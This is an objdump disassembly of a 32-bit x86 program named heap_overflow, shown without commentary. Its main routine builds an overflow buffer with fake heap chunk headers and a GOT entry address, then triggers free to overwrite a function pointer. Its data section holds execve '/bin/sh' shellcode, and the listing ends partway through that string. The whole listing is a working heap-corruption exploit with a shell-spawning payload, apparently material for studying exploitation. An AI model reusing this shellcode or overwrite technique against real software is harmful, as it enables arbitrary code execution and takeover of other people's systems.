heap_overflow: file format elf32-i386 Disassembly of section .interp: 080480f4 <.interp>: 80480f4: 2f das 80480f5: 6c insb (%dx),%es:(%edi) 80480f6: 69 62 2f 6c 64 2d 6c imul $0x6c2d646c,0x2f(%edx),%esp 80480fd: 69 6e 75 78 2e 73 6f imul $0x6f732e78,0x75(%esi),%ebp 8048104: 2e 32 00 xor %cs:(%eax),%al Disassembly of section .note.ABI-tag: 08048108 <.note.ABI-tag>: 8048108: 04 00 add $0x0,%al 804810a: 00 00 add %al,(%eax) 804810c: 10 00 adc %al,(%eax) 804810e: 00 00 add %al,(%eax) 8048110: 01 00 add %eax,(%eax) 8048112: 00 00 add %al,(%eax) 8048114: 47 inc %edi 8048115: 4e dec %esi 8048116: 55 push %ebp 8048117: 00 00 add %al,(%eax) 8048119: 00 00 add %al,(%eax) 804811b: 00 02 add %al,(%edx) 804811d: 00 00 add %al,(%eax) 804811f: 00 02 add %al,(%edx) 8048121: 00 00 add %al,(%eax) 8048123: 00 .byte 0x0 8048124: 05 .byte 0x5 8048125: 00 00 add %al,(%eax) ... Disassembly of section .hash: 08048128 <.hash>: 8048128: 03 00 add (%eax),%eax 804812a: 00 00 add %al,(%eax) 804812c: 0b 00 or (%eax),%eax 804812e: 00 00 add %al,(%eax) 8048130: 09 00 or %eax,(%eax) 8048132: 00 00 add %al,(%eax) 8048134: 06 push %es 8048135: 00 00 add %al,(%eax) 8048137: 00 0a add %cl,(%edx) ... 8048145: 00 00 add %al,(%eax) 8048147: 00 02 add %al,(%edx) 8048149: 00 00 add %al,(%eax) 804814b: 00 01 add %al,(%ecx) 804814d: 00 00 add %al,(%eax) 804814f: 00 00 add %al,(%eax) 8048151: 00 00 add %al,(%eax) 8048153: 00 03 add %al,(%ebx) 8048155: 00 00 add %al,(%eax) 8048157: 00 05 00 00 00 04 add %al,0x4000000 804815d: 00 00 add %al,(%eax) 804815f: 00 07 add %al,(%edi) 8048161: 00 00 add %al,(%eax) 8048163: 00 08 add %cl,(%eax) 8048165: 00 00 add %al,(%eax) ... Disassembly of section .dynsym: 08048168 <.dynsym>: ... 8048178: 20 00 and %al,(%eax) 804817a: 00 00 add %al,(%eax) 804817c: 34 83 xor $0x83,%al 804817e: 04 08 add $0x8,%al 8048180: b4 01 mov $0x1,%ah 8048182: 00 00 add %al,(%eax) 8048184: 12 00 adc (%eax),%al 8048186: 00 00 add %al,(%eax) 8048188: 4f dec %edi 8048189: 00 00 add %al,(%eax) 804818b: 00 44 83 04 add %al,0x4(%ebx,%eax,4) 804818f: 08 af 00 00 00 12 or %ch,0x12000000(%edi) 8048195: 00 00 add %al,(%eax) 8048197: 00 3d 00 00 00 54 add %bh,0x54000000 804819d: 83 04 08 fb addl $0xfffffffb,(%eax,%ecx,1) 80481a1: 00 00 add %al,(%eax) 80481a3: 00 12 add %dl,(%edx) 80481a5: 00 00 add %al,(%eax) 80481a7: 00 12 add %dl,(%edx) 80481a9: 00 00 add %al,(%eax) 80481ab: 00 64 83 04 add %ah,0x4(%ebx,%eax,4) 80481af: 08 39 or %bh,(%ecx) 80481b1: 00 00 add %al,(%eax) 80481b3: 00 12 add %dl,(%edx) 80481b5: 00 00 add %al,(%eax) 80481b7: 00 19 add %bl,(%ecx) 80481b9: 00 00 add %al,(%eax) 80481bb: 00 74 83 04 add %dh,0x4(%ebx,%eax,4) 80481bf: 08 27 or %ah,(%edi) 80481c1: 00 00 add %al,(%eax) 80481c3: 00 12 add %dl,(%edx) 80481c5: 00 00 add %al,(%eax) 80481c7: 00 56 00 add %dl,0x0(%esi) 80481ca: 00 00 add %al,(%eax) 80481cc: 84 83 04 08 b9 00 test %al,0xb90804(%ebx) 80481d2: 00 00 add %al,(%eax) 80481d4: 12 00 adc (%eax),%al 80481d6: 00 00 add %al,(%eax) 80481d8: 27 daa 80481d9: 00 00 add %al,(%eax) 80481db: 00 94 83 04 08 43 00 add %dl,0x430804(%ebx,%eax,4) 80481e2: 00 00 add %al,(%eax) 80481e4: 12 00 adc (%eax),%al 80481e6: 00 00 add %al,(%eax) 80481e8: 2e 00 00 add %al,%cs:(%eax) 80481eb: 00 44 87 04 add %al,0x4(%edi,%eax,4) 80481ef: 08 04 00 or %al,(%eax,%eax,1) 80481f2: 00 00 add %al,(%eax) 80481f4: 11 00 adc %eax,(%eax) 80481f6: 0e push %cs 80481f7: 00 5b 00 add %bl,0x0(%ebx) ... 8048202: 00 00 add %al,(%eax) 8048204: 20 00 and %al,(%eax) 8048206: 00 00 add %al,(%eax) 8048208: 0b 00 or (%eax),%eax 804820a: 00 00 add %al,(%eax) 804820c: a4 movsb %ds:(%esi),%es:(%edi) 804820d: 83 04 08 30 addl $0x30,(%eax,%ecx,1) 8048211: 00 00 add %al,(%eax) 8048213: 00 12 add %dl,(%edx) 8048215: 00 00 add %al,(%eax) ... Disassembly of section .dynstr: 08048218 <.dynstr>: 8048218: 00 6c 69 62 add %ch,0x62(%ecx,%ebp,2) 804821c: 63 2e arpl %bp,(%esi) 804821e: 73 6f jae 804828f <_init-0x7d> 8048220: 2e 36 00 73 74 add %dh,%cs:%ss:0x74(%ebx) 8048225: 72 63 jb 804828a <_init-0x82> 8048227: 70 79 jo 80482a2 <_init-0x6a> 8048229: 00 70 72 add %dh,0x72(%eax) 804822c: 69 6e 74 66 00 6d 65 imul $0x656d0066,0x74(%esi),%ebp 8048233: 6d insl (%dx),%es:(%edi) 8048234: 63 70 79 arpl %si,0x79(%eax) 8048237: 00 6d 61 add %ch,0x61(%ebp) 804823a: 6c insb (%dx),%es:(%edi) 804823b: 6c insb (%dx),%es:(%edi) 804823c: 6f outsl %ds:(%esi),(%dx) 804823d: 63 00 arpl %ax,(%eax) 804823f: 6d insl (%dx),%es:(%edi) 8048240: 65 gs 8048241: 6d insl (%dx),%es:(%edi) 8048242: 73 65 jae 80482a9 <_init-0x63> 8048244: 74 00 je 8048246 <_init-0xc6> 8048246: 5f pop %edi 8048247: 49 dec %ecx 8048248: 4f dec %edi 8048249: 5f pop %edi 804824a: 73 74 jae 80482c0 <_init-0x4c> 804824c: 64 69 6e 5f 75 73 65 imul $0x64657375,%fs:0x5f(%esi),%ebp 8048253: 64 8048254: 00 5f 5f add %bl,0x5f(%edi) 8048257: 6c insb (%dx),%es:(%edi) 8048258: 69 62 63 5f 73 74 61 imul $0x6174735f,0x63(%edx),%esp 804825f: 72 74 jb 80482d5 <_init-0x37> 8048261: 5f pop %edi 8048262: 6d insl (%dx),%es:(%edi) 8048263: 61 popa 8048264: 69 6e 00 73 74 72 6c imul $0x6c727473,0x0(%esi),%ebp 804826b: 65 6e outsb %gs:(%esi),(%dx) 804826d: 00 66 72 add %ah,0x72(%esi) 8048270: 65 65 00 5f 5f add %bl,%gs:0x5f(%edi) 8048275: 67 6d addr16 insl (%dx),%es:(%di) 8048277: 6f outsl %ds:(%esi),(%dx) 8048278: 6e outsb %ds:(%esi),(%dx) 8048279: 5f pop %edi 804827a: 73 74 jae 80482f0 <_init-0x1c> 804827c: 61 popa 804827d: 72 74 jb 80482f3 <_init-0x19> 804827f: 5f pop %edi 8048280: 5f pop %edi 8048281: 00 47 4c add %al,0x4c(%edi) 8048284: 49 dec %ecx 8048285: 42 inc %edx 8048286: 43 inc %ebx 8048287: 5f pop %edi 8048288: 32 2e xor (%esi),%ch 804828a: 30 00 xor %al,(%eax) Disassembly of section .gnu.version: 0804828c <.gnu.version>: 804828c: 00 00 add %al,(%eax) 804828e: 02 00 add (%eax),%al 8048290: 02 00 add (%eax),%al 8048292: 02 00 add (%eax),%al 8048294: 02 00 add (%eax),%al 8048296: 02 00 add (%eax),%al 8048298: 02 00 add (%eax),%al 804829a: 02 00 add (%eax),%al 804829c: 01 00 add %eax,(%eax) 804829e: 00 00 add %al,(%eax) 80482a0: 02 00 add (%eax),%al Disassembly of section .gnu.version_r: 080482a4 <.gnu.version_r>: 80482a4: 01 00 add %eax,(%eax) 80482a6: 01 00 add %eax,(%eax) 80482a8: 01 00 add %eax,(%eax) 80482aa: 00 00 add %al,(%eax) 80482ac: 10 00 adc %al,(%eax) 80482ae: 00 00 add %al,(%eax) 80482b0: 00 00 add %al,(%eax) 80482b2: 00 00 add %al,(%eax) 80482b4: 10 69 69 adc %ch,0x69(%ecx) 80482b7: 0d 00 00 02 00 or $0x20000,%eax 80482bc: 6a 00 push $0x0 80482be: 00 00 add %al,(%eax) 80482c0: 00 00 add %al,(%eax) ... Disassembly of section .rel.dyn: 080482c4 <.rel.dyn>: 80482c4: 64 fs 80482c5: 99 cltd 80482c6: 04 08 add $0x8,%al 80482c8: 06 push %es 80482c9: 09 00 or %eax,(%eax) ... Disassembly of section .rel.plt: 080482cc <.rel.plt>: 80482cc: 44 inc %esp 80482cd: 99 cltd 80482ce: 04 08 add $0x8,%al 80482d0: 07 pop %es 80482d1: 01 00 add %eax,(%eax) 80482d3: 00 48 99 add %cl,0xffffff99(%eax) 80482d6: 04 08 add $0x8,%al 80482d8: 07 pop %es 80482d9: 02 00 add (%eax),%al 80482db: 00 4c 99 04 add %cl,0x4(%ecx,%ebx,4) 80482df: 08 07 or %al,(%edi) 80482e1: 03 00 add (%eax),%eax 80482e3: 00 50 99 add %dl,0xffffff99(%eax) 80482e6: 04 08 add $0x8,%al 80482e8: 07 pop %es 80482e9: 04 00 add $0x0,%al 80482eb: 00 54 99 04 add %dl,0x4(%ecx,%ebx,4) 80482ef: 08 07 or %al,(%edi) 80482f1: 05 00 00 58 99 add $0x99580000,%eax 80482f6: 04 08 add $0x8,%al 80482f8: 07 pop %es 80482f9: 06 push %es 80482fa: 00 00 add %al,(%eax) 80482fc: 5c pop %esp 80482fd: 99 cltd 80482fe: 04 08 add $0x8,%al 8048300: 07 pop %es 8048301: 07 pop %es 8048302: 00 00 add %al,(%eax) 8048304: 60 pusha 8048305: 99 cltd 8048306: 04 08 add $0x8,%al 8048308: 07 pop %es 8048309: 0a 00 or (%eax),%al ... Disassembly of section .init: 0804830c <_init>: 804830c: 55 push %ebp 804830d: 89 e5 mov %esp,%ebp 804830f: 83 ec 08 sub $0x8,%esp 8048312: e8 c1 00 00 00 call 80483d8 8048317: e8 1c 01 00 00 call 8048438 804831c: e8 d3 03 00 00 call 80486f4 <__do_global_ctors_aux> 8048321: c9 leave 8048322: c3 ret Disassembly of section .plt: 08048324 <.plt>: 8048324: ff 35 3c 99 04 08 pushl 0x804993c 804832a: ff 25 40 99 04 08 jmp *0x8049940 8048330: 00 00 add %al,(%eax) 8048332: 00 00 add %al,(%eax) 8048334: ff 25 44 99 04 08 jmp *0x8049944 804833a: 68 00 00 00 00 push $0x0 804833f: e9 e0 ff ff ff jmp 8048324 <_init+0x18> 8048344: ff 25 48 99 04 08 jmp *0x8049948 804834a: 68 08 00 00 00 push $0x8 804834f: e9 d0 ff ff ff jmp 8048324 <_init+0x18> 8048354: ff 25 4c 99 04 08 jmp *0x804994c 804835a: 68 10 00 00 00 push $0x10 804835f: e9 c0 ff ff ff jmp 8048324 <_init+0x18> 8048364: ff 25 50 99 04 08 jmp *0x8049950 804836a: 68 18 00 00 00 push $0x18 804836f: e9 b0 ff ff ff jmp 8048324 <_init+0x18> 8048374: ff 25 54 99 04 08 jmp *0x8049954 804837a: 68 20 00 00 00 push $0x20 804837f: e9 a0 ff ff ff jmp 8048324 <_init+0x18> 8048384: ff 25 58 99 04 08 jmp *0x8049958 804838a: 68 28 00 00 00 push $0x28 804838f: e9 90 ff ff ff jmp 8048324 <_init+0x18> 8048394: ff 25 5c 99 04 08 jmp *0x804995c 804839a: 68 30 00 00 00 push $0x30 804839f: e9 80 ff ff ff jmp 8048324 <_init+0x18> 80483a4: ff 25 60 99 04 08 jmp *0x8049960 80483aa: 68 38 00 00 00 push $0x38 80483af: e9 70 ff ff ff jmp 8048324 <_init+0x18> Disassembly of section .text: 080483b4 <_start>: 80483b4: 31 ed xor %ebp,%ebp 80483b6: 5e pop %esi 80483b7: 89 e1 mov %esp,%ecx 80483b9: 83 e4 f0 and $0xfffffff0,%esp 80483bc: 50 push %eax 80483bd: 54 push %esp 80483be: 52 push %edx 80483bf: 68 c0 86 04 08 push $0x80486c0 80483c4: 68 90 86 04 08 push $0x8048690 80483c9: 51 push %ecx 80483ca: 56 push %esi 80483cb: 68 64 84 04 08 push $0x8048464 80483d0: e8 7f ff ff ff call 8048354 <_init+0x48> 80483d5: f4 hlt 80483d6: 90 nop 80483d7: 90 nop 080483d8 : 80483d8: 55 push %ebp 80483d9: 89 e5 mov %esp,%ebp 80483db: 53 push %ebx 80483dc: 50 push %eax 80483dd: e8 00 00 00 00 call 80483e2 80483e2: 5b pop %ebx 80483e3: 81 c3 56 15 00 00 add $0x1556,%ebx 80483e9: 8b 83 2c 00 00 00 mov 0x2c(%ebx),%eax 80483ef: 85 c0 test %eax,%eax 80483f1: 74 02 je 80483f5 80483f3: ff d0 call *%eax 80483f5: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80483f8: c9 leave 80483f9: c3 ret 80483fa: 90 nop 80483fb: 90 nop 080483fc <__do_global_dtors_aux>: 80483fc: 55 push %ebp 80483fd: 89 e5 mov %esp,%ebp 80483ff: 83 ec 08 sub $0x8,%esp 8048402: 80 3d 68 99 04 08 00 cmpb $0x0,0x8049968 8048409: 75 29 jne 8048434 <__do_global_dtors_aux+0x38> 804840b: a1 08 98 04 08 mov 0x8049808,%eax 8048410: 8b 10 mov (%eax),%edx 8048412: 85 d2 test %edx,%edx 8048414: 74 17 je 804842d <__do_global_dtors_aux+0x31> 8048416: 89 f6 mov %esi,%esi 8048418: 83 c0 04 add $0x4,%eax 804841b: a3 08 98 04 08 mov %eax,0x8049808 8048420: ff d2 call *%edx 8048422: a1 08 98 04 08 mov 0x8049808,%eax 8048427: 8b 10 mov (%eax),%edx 8048429: 85 d2 test %edx,%edx 804842b: 75 eb jne 8048418 <__do_global_dtors_aux+0x1c> 804842d: c6 05 68 99 04 08 01 movb $0x1,0x8049968 8048434: c9 leave 8048435: c3 ret 8048436: 89 f6 mov %esi,%esi 08048438 : 8048438: 55 push %ebp 8048439: 89 e5 mov %esp,%ebp 804843b: 83 ec 08 sub $0x8,%esp 804843e: a1 34 99 04 08 mov 0x8049934,%eax 8048443: 85 c0 test %eax,%eax 8048445: 74 19 je 8048460 8048447: b8 00 00 00 00 mov $0x0,%eax 804844c: 85 c0 test %eax,%eax 804844e: 74 10 je 8048460 8048450: 83 ec 0c sub $0xc,%esp 8048453: 68 34 99 04 08 push $0x8049934 8048458: e8 a3 7b fb f7 call 0 <_init-0x804830c> 804845d: 83 c4 10 add $0x10,%esp 8048460: c9 leave 8048461: c3 ret 8048462: 90 nop 8048463: 90 nop 08048464
: 8048464: 55 push %ebp 8048465: 89 e5 mov %esp,%ebp 8048467: 81 ec c8 02 00 00 sub $0x2c8,%esp 804846d: 83 e4 f0 and $0xfffffff0,%esp 8048470: b8 00 00 00 00 mov $0x0,%eax 8048475: 29 c4 sub %eax,%esp 8048477: 83 ec 0c sub $0xc,%esp 804847a: 68 9a 02 00 00 push $0x29a 804847f: e8 b0 fe ff ff call 8048334 <_init+0x28> 8048484: 83 c4 10 add $0x10,%esp 8048487: 89 45 f4 mov %eax,0xfffffff4(%ebp) 804848a: 83 ec 0c sub $0xc,%esp 804848d: 6a 0c push $0xc 804848f: e8 a0 fe ff ff call 8048334 <_init+0x28> 8048494: 83 c4 10 add $0x10,%esp 8048497: 89 45 f0 mov %eax,0xfffffff0(%ebp) 804849a: 83 ec 0c sub $0xc,%esp 804849d: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 80484a0: 83 c0 04 add $0x4,%eax 80484a3: ff 30 pushl (%eax) 80484a5: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 80484a8: ff 30 pushl (%eax) 80484aa: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 80484ad: 83 e8 04 sub $0x4,%eax 80484b0: ff 30 pushl (%eax) 80484b2: ff 75 f4 pushl 0xfffffff4(%ebp) 80484b5: 68 60 87 04 08 push $0x8048760 80484ba: e8 a5 fe ff ff call 8048364 <_init+0x58> 80484bf: 83 c4 20 add $0x20,%esp 80484c2: 83 ec 0c sub $0xc,%esp 80484c5: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 80484c8: 83 c0 04 add $0x4,%eax 80484cb: ff 30 pushl (%eax) 80484cd: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 80484d0: ff 30 pushl (%eax) 80484d2: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 80484d5: 83 e8 04 sub $0x4,%eax 80484d8: ff 30 pushl (%eax) 80484da: ff 75 f0 pushl 0xfffffff0(%ebp) 80484dd: 68 a0 87 04 08 push $0x80487a0 80484e2: e8 7d fe ff ff call 8048364 <_init+0x58> 80484e7: 83 c4 20 add $0x20,%esp 80484ea: 8d 85 38 fd ff ff lea 0xfffffd38(%ebp),%eax 80484f0: 89 45 ec mov %eax,0xffffffec(%ebp) 80484f3: 8b 45 ec mov 0xffffffec(%ebp),%eax 80484f6: c7 00 78 56 34 12 movl $0x12345678,(%eax) 80484fc: 8d 45 ec lea 0xffffffec(%ebp),%eax 80484ff: 83 00 04 addl $0x4,(%eax) 8048502: 8b 45 ec mov 0xffffffec(%ebp),%eax 8048505: c7 00 78 56 34 12 movl $0x12345678,(%eax) 804850b: 8d 45 ec lea 0xffffffec(%ebp),%eax 804850e: 83 00 04 addl $0x4,(%eax) 8048511: 83 ec 04 sub $0x4,%esp 8048514: 83 ec 08 sub $0x8,%esp 8048517: 68 20 98 04 08 push $0x8049820 804851c: e8 23 fe ff ff call 8048344 <_init+0x38> 8048521: 83 c4 0c add $0xc,%esp 8048524: 50 push %eax 8048525: 68 20 98 04 08 push $0x8049820 804852a: ff 75 ec pushl 0xffffffec(%ebp) 804852d: e8 42 fe ff ff call 8048374 <_init+0x68> 8048532: 83 c4 10 add $0x10,%esp 8048535: 83 ec 0c sub $0xc,%esp 8048538: 68 20 98 04 08 push $0x8049820 804853d: e8 02 fe ff ff call 8048344 <_init+0x38> 8048542: 83 c4 10 add $0x10,%esp 8048545: 89 c2 mov %eax,%edx 8048547: 8d 45 ec lea 0xffffffec(%ebp),%eax 804854a: 01 10 add %edx,(%eax) 804854c: 83 ec 04 sub $0x4,%esp 804854f: 83 ec 08 sub $0x8,%esp 8048552: 68 20 98 04 08 push $0x8049820 8048557: e8 e8 fd ff ff call 8048344 <_init+0x38> 804855c: 83 c4 0c add $0xc,%esp 804855f: 89 c2 mov %eax,%edx 8048561: b8 90 02 00 00 mov $0x290,%eax 8048566: 29 d0 sub %edx,%eax 8048568: 50 push %eax 8048569: 6a 42 push $0x42 804856b: ff 75 ec pushl 0xffffffec(%ebp) 804856e: e8 21 fe ff ff call 8048394 <_init+0x88> 8048573: 83 c4 10 add $0x10,%esp 8048576: 83 ec 0c sub $0xc,%esp 8048579: 68 20 98 04 08 push $0x8049820 804857e: e8 c1 fd ff ff call 8048344 <_init+0x38> 8048583: 83 c4 10 add $0x10,%esp 8048586: 89 c2 mov %eax,%edx 8048588: 8b 45 ec mov 0xffffffec(%ebp),%eax 804858b: 29 d0 sub %edx,%eax 804858d: 05 90 02 00 00 add $0x290,%eax 8048592: 89 45 ec mov %eax,0xffffffec(%ebp) 8048595: 8b 45 ec mov 0xffffffec(%ebp),%eax 8048598: c7 00 78 56 34 12 movl $0x12345678,(%eax) 804859e: 8d 45 ec lea 0xffffffec(%ebp),%eax 80485a1: 83 00 04 addl $0x4,(%eax) 80485a4: 8b 45 ec mov 0xffffffec(%ebp),%eax 80485a7: c7 00 fc ff ff ff movl $0xfffffffc,(%eax) 80485ad: 8d 45 ec lea 0xffffffec(%ebp),%eax 80485b0: 83 00 04 addl $0x4,(%eax) 80485b3: 8b 45 ec mov 0xffffffec(%ebp),%eax 80485b6: c7 00 4c 99 04 08 movl $0x804994c,(%eax) 80485bc: 8d 45 ec lea 0xffffffec(%ebp),%eax 80485bf: 83 00 04 addl $0x4,(%eax) 80485c2: 8b 55 ec mov 0xffffffec(%ebp),%edx 80485c5: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 80485c8: 83 c0 08 add $0x8,%eax 80485cb: 89 02 mov %eax,(%edx) 80485cd: 8d 45 ec lea 0xffffffec(%ebp),%eax 80485d0: 83 00 04 addl $0x4,(%eax) 80485d3: 8b 45 ec mov 0xffffffec(%ebp),%eax 80485d6: c6 00 00 movb $0x0,(%eax) 80485d9: 83 ec 08 sub $0x8,%esp 80485dc: 8d 85 38 fd ff ff lea 0xfffffd38(%ebp),%eax 80485e2: 50 push %eax 80485e3: ff 75 f4 pushl 0xfffffff4(%ebp) 80485e6: e8 b9 fd ff ff call 80483a4 <_init+0x98> 80485eb: 83 c4 10 add $0x10,%esp 80485ee: 83 ec 0c sub $0xc,%esp 80485f1: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 80485f4: 83 c0 04 add $0x4,%eax 80485f7: ff 30 pushl (%eax) 80485f9: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 80485fc: ff 30 pushl (%eax) 80485fe: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 8048601: 83 e8 04 sub $0x4,%eax 8048604: ff 30 pushl (%eax) 8048606: ff 75 f4 pushl 0xfffffff4(%ebp) 8048609: 68 60 87 04 08 push $0x8048760 804860e: e8 51 fd ff ff call 8048364 <_init+0x58> 8048613: 83 c4 20 add $0x20,%esp 8048616: 83 ec 0c sub $0xc,%esp 8048619: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 804861c: 83 c0 04 add $0x4,%eax 804861f: ff 30 pushl (%eax) 8048621: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 8048624: ff 30 pushl (%eax) 8048626: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 8048629: 83 e8 04 sub $0x4,%eax 804862c: ff 30 pushl (%eax) 804862e: ff 75 f0 pushl 0xfffffff0(%ebp) 8048631: 68 a0 87 04 08 push $0x80487a0 8048636: e8 29 fd ff ff call 8048364 <_init+0x58> 804863b: 83 c4 20 add $0x20,%esp 804863e: 83 ec 08 sub $0x8,%esp 8048641: ff 35 58 99 04 08 pushl 0x8049958 8048647: 68 d0 87 04 08 push $0x80487d0 804864c: e8 13 fd ff ff call 8048364 <_init+0x58> 8048651: 83 c4 10 add $0x10,%esp 8048654: 83 ec 0c sub $0xc,%esp 8048657: ff 75 f4 pushl 0xfffffff4(%ebp) 804865a: e8 25 fd ff ff call 8048384 <_init+0x78> 804865f: 83 c4 10 add $0x10,%esp 8048662: 83 ec 08 sub $0x8,%esp 8048665: ff 35 58 99 04 08 pushl 0x8049958 804866b: 68 d0 87 04 08 push $0x80487d0 8048670: e8 ef fc ff ff call 8048364 <_init+0x58> 8048675: 83 c4 10 add $0x10,%esp 8048678: 83 ec 0c sub $0xc,%esp 804867b: ff 75 f0 pushl 0xfffffff0(%ebp) 804867e: e8 01 fd ff ff call 8048384 <_init+0x78> 8048683: 83 c4 10 add $0x10,%esp 8048686: b8 00 00 00 00 mov $0x0,%eax 804868b: c9 leave 804868c: c3 ret 804868d: 90 nop 804868e: 90 nop 804868f: 90 nop 08048690 <__libc_csu_init>: 8048690: 55 push %ebp 8048691: 89 e5 mov %esp,%ebp 8048693: 56 push %esi 8048694: 53 push %ebx 8048695: e8 72 fc ff ff call 804830c <_init> 804869a: b8 ec 97 04 08 mov $0x80497ec,%eax 804869f: 2d ec 97 04 08 sub $0x80497ec,%eax 80486a4: c1 f8 02 sar $0x2,%eax 80486a7: 31 db xor %ebx,%ebx 80486a9: 39 c3 cmp %eax,%ebx 80486ab: 73 0f jae 80486bc <__libc_csu_init+0x2c> 80486ad: 89 c6 mov %eax,%esi 80486af: 90 nop 80486b0: ff 14 9d ec 97 04 08 call *0x80497ec(,%ebx,4) 80486b7: 43 inc %ebx 80486b8: 39 f3 cmp %esi,%ebx 80486ba: 72 f4 jb 80486b0 <__libc_csu_init+0x20> 80486bc: 5b pop %ebx 80486bd: 5e pop %esi 80486be: c9 leave 80486bf: c3 ret 080486c0 <__libc_csu_fini>: 80486c0: 55 push %ebp 80486c1: 89 e5 mov %esp,%ebp 80486c3: 53 push %ebx 80486c4: 50 push %eax 80486c5: b8 ec 97 04 08 mov $0x80497ec,%eax 80486ca: 2d ec 97 04 08 sub $0x80497ec,%eax 80486cf: c1 f8 02 sar $0x2,%eax 80486d2: 85 c0 test %eax,%eax 80486d4: 8d 58 ff lea 0xffffffff(%eax),%ebx 80486d7: 75 0b jne 80486e4 <__libc_csu_fini+0x24> 80486d9: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80486dc: c9 leave 80486dd: e9 36 00 00 00 jmp 8048718 <_fini> 80486e2: 89 f6 mov %esi,%esi 80486e4: ff 14 9d ec 97 04 08 call *0x80497ec(,%ebx,4) 80486eb: 89 da mov %ebx,%edx 80486ed: 4b dec %ebx 80486ee: 85 d2 test %edx,%edx 80486f0: 75 f2 jne 80486e4 <__libc_csu_fini+0x24> 80486f2: eb e5 jmp 80486d9 <__libc_csu_fini+0x19> 080486f4 <__do_global_ctors_aux>: 80486f4: 55 push %ebp 80486f5: 89 e5 mov %esp,%ebp 80486f7: 53 push %ebx 80486f8: 52 push %edx 80486f9: a1 24 99 04 08 mov 0x8049924,%eax 80486fe: 83 f8 ff cmp $0xffffffff,%eax 8048701: bb 24 99 04 08 mov $0x8049924,%ebx 8048706: 74 0c je 8048714 <__do_global_ctors_aux+0x20> 8048708: 83 eb 04 sub $0x4,%ebx 804870b: ff d0 call *%eax 804870d: 8b 03 mov (%ebx),%eax 804870f: 83 f8 ff cmp $0xffffffff,%eax 8048712: 75 f4 jne 8048708 <__do_global_ctors_aux+0x14> 8048714: 58 pop %eax 8048715: 5b pop %ebx 8048716: c9 leave 8048717: c3 ret Disassembly of section .fini: 08048718 <_fini>: 8048718: 55 push %ebp 8048719: 89 e5 mov %esp,%ebp 804871b: 53 push %ebx 804871c: 52 push %edx 804871d: e8 00 00 00 00 call 8048722 <_fini+0xa> 8048722: 5b pop %ebx 8048723: 81 c3 16 12 00 00 add $0x1216,%ebx 8048729: e8 ce fc ff ff call 80483fc <__do_global_dtors_aux> 804872e: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 8048731: c9 leave 8048732: c3 ret Disassembly of section .rodata: 08048740 <_fp_hw>: 8048740: 03 00 add (%eax),%eax ... 08048744 <_IO_stdin_used>: 8048744: 01 00 add %eax,(%eax) 8048746: 02 00 add (%eax),%al ... 8048760: 66 69 72 73 74 3d imul $0x3d74,0x73(%edx),%si 8048766: 25 78 20 73 69 and $0x69732078,%eax 804876b: 7a 65 jp 80487d2 <_IO_stdin_used+0x8e> 804876d: 3d 25 78 20 66 cmp $0x66207825,%eax 8048772: 69 72 73 74 2d 3e 66 imul $0x663e2d74,0x73(%edx),%esi 8048779: 64 fs 804877a: 3d 25 78 20 66 cmp $0x66207825,%eax 804877f: 69 72 73 74 2d 3e 62 imul $0x623e2d74,0x73(%edx),%esi 8048786: 6b 3d 25 78 0a 00 00 imul $0x0,0xa7825,%edi ... 804879d: 00 00 add %al,(%eax) 804879f: 00 73 65 add %dh,0x65(%ebx) 80487a2: 63 6f 6e arpl %bp,0x6e(%edi) 80487a5: 64 fs 80487a6: 3d 25 78 20 73 cmp $0x73207825,%eax 80487ab: 69 7a 65 3d 25 78 20 imul $0x2078253d,0x65(%edx),%edi 80487b2: 73 65 jae 8048819 <__EH_FRAME_BEGIN__+0x31> 80487b4: 63 6f 6e arpl %bp,0x6e(%edi) 80487b7: 64 fs 80487b8: 2d 3e 66 64 3d sub $0x3d64663e,%eax 80487bd: 25 78 20 73 65 and $0x65732078,%eax 80487c2: 63 6f 6e arpl %bp,0x6e(%edi) 80487c5: 64 fs 80487c6: 2d 3e 62 6b 3d sub $0x3d6b623e,%eax 80487cb: 25 78 0a 0a 00 and $0xa0a78,%eax 80487d0: 2a 46 55 sub 0x55(%esi),%al 80487d3: 4e dec %esi 80487d4: 43 inc %ebx 80487d5: 54 push %esp 80487d6: 49 dec %ecx 80487d7: 4f dec %edi 80487d8: 4e dec %esi 80487d9: 5f pop %edi 80487da: 50 push %eax 80487db: 4f dec %edi 80487dc: 49 dec %ecx 80487dd: 4e dec %esi 80487de: 54 push %esp 80487df: 45 inc %ebp 80487e0: 52 push %edx 80487e1: 3d 25 78 0a 00 cmp $0xa7825,%eax Disassembly of section .eh_frame: 080487e8 <__EH_FRAME_BEGIN__>: 80487e8: 00 00 add %al,(%eax) ... Disassembly of section .data: 08049800 <__data_start>: 8049800: 00 00 add %al,(%eax) ... 08049804 <__dso_handle>: 8049804: 00 00 add %al,(%eax) ... 08049808 : 8049808: 30 99 04 08 00 00 xor %bl,0x804(%ecx) ... 08049820 : 8049820: eb 0a jmp 804982c 8049822: 30 31 xor %dh,(%ecx) 8049824: 32 33 xor (%ebx),%dh 8049826: 34 35 xor $0x35,%al 8049828: 36 ss 8049829: 37 aaa 804982a: 38 39 cmp %bh,(%ecx) 804982c: eb 1f jmp 804984d 804982e: 5e pop %esi 804982f: 89 76 08 mov %esi,0x8(%esi) 8049832: 31 c0 xor %eax,%eax 8049834: 88 46 07 mov %al,0x7(%esi) 8049837: 89 46 0c mov %eax,0xc(%esi) 804983a: b0 0b mov $0xb,%al 804983c: 89 f3 mov %esi,%ebx 804983e: 8d 4e 08 lea 0x8(%esi),%ecx 8049841: 8d 56 0c lea 0xc(%esi),%edx 8049844: cd 80 int $0x80 8049846: 31 db xor %ebx,%ebx 8049848: 89 d8 mov %ebx,%eax 804984a: 40 inc %eax 804984b: cd 80 int $0x80 804984d: e8 dc ff ff ff call 804982e 8049852: 2f das 8049853: 62 69 6e bound %ebp,0x6e(%ecx) 8049856: 2f das 